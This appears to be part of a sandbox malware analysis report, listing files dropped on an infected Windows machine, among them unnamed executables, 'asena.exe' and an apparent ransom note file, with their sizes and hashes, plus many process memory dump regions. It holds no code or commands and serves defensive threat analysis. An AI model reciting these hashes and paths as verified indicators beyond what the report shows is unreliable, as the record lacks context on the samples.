                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\HistoryData.db

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  160KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  f310cf1ff562ae14449e0167a3e1fe46

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  85c58afa9049467031c6c2b17f5c12ca73bb2788

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Web.db

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  114KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2e5b34ca73bac7d39579ae5af5c50268

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  910b0865cce750b73e308d0c9314edcdcf4162bb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  79f7541d73ed1744fbc041fdeaf95cae2e2a43cf9d73f6d9476b67a5c2ea9695

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  95dcb404558da6bf1b58640440f3e26b13bf53b8fe05932e85b85dea7e629a544f2bfef094fdd23fd2ad0692297aad338e23c9e6e516e5c852d6d7c1c97249fc

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bg0pnupv.bny.ps1

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  60B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  159KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  6f8e78dd0f22b61244bb69827e0dbdc3

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  1884d9fd265659b6bd66d980ca8b776b40365b87

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  5611a83616380f55e7b42bb0eef35d65bd43ca5f96bf77f343fc9700e7dfaa7dcf4f6ecbb2349ac9df6ab77edd1051b9b0f7a532859422302549f5b81004632d

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\asena.exe

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  39KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7529e3c83618f5e3a4cc6dbf3a8534a6

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  0f944504eebfca5466b6113853b0d83e38cf885a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ec35c76ad2c8192f09c02eca1f263b406163470ca8438d054db7adcf5bfc0597

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  7eef97937cc1e3afd3fca0618328a5b6ecb72123a199739f6b1b972dd90e01e07492eb26352ee00421d026c63af48973c014bdd76d95ea841eb2fefd613631cc

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\d6caf64597bd5e0803f7d0034e73195e83dae370450a2e890b82f77856830167.exe

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  76KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  e8ae3940c30296d494e534e0379f15d6

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3bcb5e7bc9c317c3c067f36d7684a419da79506c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d6caf64597bd5e0803f7d0034e73195e83dae370450a2e890b82f77856830167

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d07b8e684fc1c7a103b64b46d777091bb79103448e91f862c12f0080435feff1c9e907472b7fd4e236ff0b0a8e90dbbaaac202e2238f95578fed1ff6f5247386

                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\wct5B20.tmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  63KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a0ffd08d4d774169ea72d04014994214

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  dffc56d27487f5ec5f9a7e26c825c5b80185991c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  693799212f1c5fd95b744f5d17bc00491ab50e7be98aebab60982be3f9d6789f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3bc9f1d4afdff972bc2eef6b3454fe4fe6813890fc49b2c2ca0c874c4be94fa76931a0a91a5030933ff1b4db653839d744add3eb2b272d03cceb4ba2aef4b4a1

                                                                                                                                                                                                                                                • C:\Users\Admin\tbtnds.dat

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  fbf18d31ab1c40b93d578d9bc4e7b9bc

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d82359c48ab8400c235a011d87518542b9c482e1

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  fd70fc763022870a360de92ce925ea19eed59bacf7ad149fabe00fc3f31ec2d5

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  2ce5b88e4d264985078bb8919d57f6ac9db24ed097a1490a66f1b78602d8af3edc1d9c7db3cd2175128205a60ed87741dc2e5394bbbeb941f80423140002f267

                                                                                                                                                                                                                                                • C:\Users\Public\Documents\RGNR_7C49C94F.txt

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0880547340d1b849a7d4faaf04b6f905

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  37fa5848977fd39df901be01c75b8f8320b46322

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  84449f1e874b763619271a57bfb43bd06e9c728c6c6f51317c56e9e94e619b25

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9048a3d5ab7472c1daa1efe4a35d559fc069051a5eb4b8439c2ef25318b4de6a6c648a7db595e7ae76f215614333e3f06184eb18b2904aace0c723f8b9c35a91

                                                                                                                                                                                                                                                • C:\vcredist2010_x86.log.html

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  81KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9c40cbd6a63f0b6ed90dd34eb8cdf4cb

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  0a5a3a693f8487402c46f569672d035282ed7ea1

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  75c02196c24d20c4c501e51ce8727cca595d057e8adb0dbb084fabbfff6e15e9

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3516b811d6a99aefa021e89d2f77f81f6af238bcd3f73ee0e3d84cee7c123bd4bff639762874bac95619ccce32da92e79d01583642b6a6057cd4924703c1b531

                                                                                                                                                                                                                                                • memory/216-2632-0x00000000007D0000-0x00000000007E0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/936-1735-0x0000000000250000-0x0000000000260000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1116-1901-0x00000000009E0000-0x00000000009F0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1192-1575-0x0000000000E50000-0x0000000000E60000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1308-2181-0x0000000000720000-0x0000000000730000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1424-2486-0x0000000000C50000-0x0000000000C60000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1484-2603-0x00000000005A0000-0x00000000005B0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1500-1999-0x00000000004A0000-0x00000000004B0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/1904-59-0x0000000001100000-0x0000000001125000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  148KB

                                                                                                                                                                                                                                                • memory/1904-835-0x0000000001100000-0x0000000001125000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  148KB

                                                                                                                                                                                                                                                • memory/1964-1717-0x00000000005A0000-0x00000000005B0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/2072-2070-0x0000000000840000-0x0000000000850000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/2220-2024-0x0000000000720000-0x0000000000730000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/2424-2084-0x0000000000120000-0x0000000000130000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/2428-2180-0x0000000000FE0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/2640-56-0x0000000000010000-0x0000000000088000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  480KB

                                                                                                                                                                                                                                                • memory/2640-51-0x00007FFA82353000-0x00007FFA82355000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                • memory/2800-821-0x00000000001A0000-0x00000000001C5000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  148KB

                                                                                                                                                                                                                                                • memory/3348-2288-0x00000000007A0000-0x00000000007B0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/3352-1654-0x0000000000500000-0x0000000000510000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/3472-6452-0x0000022871B10000-0x0000022871B32000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                • memory/3492-1439-0x0000000000B40000-0x0000000000B50000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/3504-29732-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                • memory/3504-29731-0x0000000000400000-0x0000000000643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2.3MB

                                                                                                                                                                                                                                                • memory/4048-2365-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4140-2918-0x00000000754B0000-0x0000000075A61000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                • memory/4140-2-0x00000000754B0000-0x0000000075A61000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                • memory/4140-1-0x00000000754B0000-0x0000000075A61000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                • memory/4140-0-0x00000000754B2000-0x00000000754B3000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4140-2908-0x00000000754B2000-0x00000000754B3000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4260-2400-0x0000000000E70000-0x0000000000E80000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4272-2741-0x0000000000B30000-0x0000000000B40000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4316-2414-0x0000000000F20000-0x0000000000F30000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4404-1775-0x0000000000B20000-0x0000000000B30000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4416-24-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  244KB

                                                                                                                                                                                                                                                • memory/4416-30956-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  244KB

                                                                                                                                                                                                                                                • memory/4416-29714-0x0000000000400000-0x000000000043D000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  244KB

                                                                                                                                                                                                                                                • memory/4548-1872-0x0000000000AB0000-0x0000000000AC0000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4572-1405-0x0000000000850000-0x0000000000860000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4648-1416-0x0000000000530000-0x0000000000540000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/4660-29729-0x00000000002B0000-0x00000000002E8000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  224KB

                                                                                                                                                                                                                                                • memory/4832-1456-0x0000000000280000-0x0000000000290000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                • memory/5084-58-0x0000000004D50000-0x0000000004DEC000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  624KB

                                                                                                                                                                                                                                                • memory/5084-57-0x00000000003B0000-0x00000000003B8000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                • memory/5284-34681-0x0000000006AC0000-0x0000000006AF2000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  200KB

                                                                                                                                                                                                                                                • memory/5284-34695-0x0000000007810000-0x000000000782A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  104KB

                                                                                                                                                                                                                                                • memory/5284-34665-0x00000000056A0000-0x0000000005CC8000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6.2MB

                                                                                                                                                                                                                                                • memory/5284-34666-0x0000000005440000-0x0000000005462000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                • memory/5284-34667-0x00000000055E0000-0x0000000005646000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                • memory/5284-34668-0x0000000005ED0000-0x0000000005F36000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                • memory/5284-34702-0x0000000007B30000-0x0000000007B38000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                • memory/5284-34701-0x0000000007B50000-0x0000000007B6A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  104KB

                                                                                                                                                                                                                                                • memory/5284-34700-0x0000000007A50000-0x0000000007A64000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                • memory/5284-34699-0x0000000007A40000-0x0000000007A4E000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  56KB

                                                                                                                                                                                                                                                • memory/5284-34698-0x0000000007A10000-0x0000000007A21000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  68KB

                                                                                                                                                                                                                                                • memory/5284-34697-0x0000000007A90000-0x0000000007B26000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  600KB

                                                                                                                                                                                                                                                • memory/5284-34696-0x0000000007890000-0x000000000789A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                • memory/5284-34664-0x0000000002F50000-0x0000000002F86000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  216KB

                                                                                                                                                                                                                                                • memory/5284-34694-0x0000000007E50000-0x00000000084CA000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6.5MB

                                                                                                                                                                                                                                                • memory/5284-34692-0x00000000076E0000-0x00000000076FE000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                • memory/5284-34693-0x0000000007700000-0x00000000077A3000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  652KB

                                                                                                                                                                                                                                                • memory/5284-34682-0x000000006D1E0000-0x000000006D22C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/5284-34680-0x0000000006A70000-0x0000000006ABC000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/5284-34679-0x00000000064F0000-0x000000000650E000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                • memory/5284-34678-0x0000000006040000-0x0000000006394000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3.3MB

                                                                                                                                                                                                                                                • memory/5288-34977-0x0000000000790000-0x00000000007DA000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  296KB

                                                                                                                                                                                                                                                • memory/6192-34965-0x0000000000C60000-0x0000000000CB4000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  336KB

                                                                                                                                                                                                                                                • memory/6272-34748-0x00000000001B0000-0x00000000001BA000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                • memory/6272-34749-0x0000000004940000-0x000000000494A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                • memory/6460-34751-0x0000000006240000-0x0000000006594000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3.3MB

                                                                                                                                                                                                                                                • memory/6460-34761-0x000000006D1E0000-0x000000006D22C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/6948-29800-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29798-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29755-0x000001798DF50000-0x000001798E080000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                • memory/6948-29756-0x00000179A8520000-0x00000179A864A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                • memory/6948-29782-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29764-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29762-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29768-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29760-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29812-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29774-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29802-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29776-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29780-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-30835-0x000001798FC70000-0x000001798FCC4000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  336KB

                                                                                                                                                                                                                                                • memory/6948-30830-0x000001798FC10000-0x000001798FC5C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/6948-30829-0x00000179A8750000-0x00000179A87F4000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  656KB

                                                                                                                                                                                                                                                • memory/6948-29757-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29770-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29772-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29804-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29788-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29797-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29778-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29784-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29758-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29814-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29790-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29792-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29786-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29794-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29766-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29810-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29806-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/6948-29808-0x00000179A8520000-0x00000179A8643000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                • memory/8408-36209-0x0000023525BB0000-0x0000023525C54000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  656KB

                                                                                                                                                                                                                                                • memory/8572-34738-0x0000000000460000-0x0000000000600000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.6MB

                                                                                                                                                                                                                                                • memory/8680-34663-0x0000000005560000-0x000000000556A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                • memory/8680-34662-0x0000000005470000-0x0000000005502000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  584KB

                                                                                                                                                                                                                                                • memory/8680-30995-0x0000000004EC0000-0x0000000005464000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                                                • memory/8680-30994-0x0000000004DB0000-0x0000000004EBA000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                • memory/8680-30997-0x0000000004C40000-0x0000000004D4A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                • memory/9704-34827-0x00000000002C0000-0x00000000002F4000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  208KB

                                                                                                                                                                                                                                                • memory/10112-30839-0x000001AE74500000-0x000001AE745BA000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  744KB